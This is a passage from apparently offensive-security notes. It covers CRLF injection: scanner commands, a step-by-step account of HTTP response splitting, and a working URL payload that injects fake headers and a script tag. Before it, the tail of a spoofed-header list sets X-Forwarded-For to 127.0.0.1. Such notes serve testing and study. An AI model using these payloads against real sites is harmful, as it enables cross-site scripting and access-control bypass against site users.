X-Client-Ip: IP 89 | X-Forwarded-For: IP 90 | X-Forwarded-For: 127.0.0.1 91 | ``` 92 | 93 | -------------------------------------------------------------------------------- /enumeration/web/crlf.md: -------------------------------------------------------------------------------- 1 | # CRLF 2 | 3 | ## Tools 4 | 5 | ```bash 6 | # https://github.com/MichaelStott/CRLF-Injection-Scanner 7 | crlf_scan.py -i -o 8 | # https://github.com/dwisiswant0/crlfuzz 9 | crlfuzz -u "http://target" 10 | # https://github.com/ryandamour/crlfmap 11 | crlfmap scan --domains domains.txt --output results.txt 12 | ``` 13 | 14 | ```text 15 | The following simplified example uses CRLF to: 16 | 17 | 1. Add a fake HTTP response header: Content-Length: 0. This causes the web browser to treat this as a terminated response and begin parsing a new response. 18 | 2. Add a fake HTTP response: HTTP/1.1 200 OK. This begins the new response. 19 | 3. Add another fake HTTP response header: Content-Type: text/html. This is needed for the web browser to properly parse the content. 20 | 4. Add yet another fake HTTP response header: Content-Length: 25. This causes the web browser to only parse the next 25 bytes. 21 | 5. Add page content with an XSS: . This content has exactly 25 bytes. 22 | 6. Because of the Content-Length header, the web browser ignores the original content that comes from the web server. 23 | 24 | http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E 25 | 26 | - Cloudflare CRLF bypass 27 |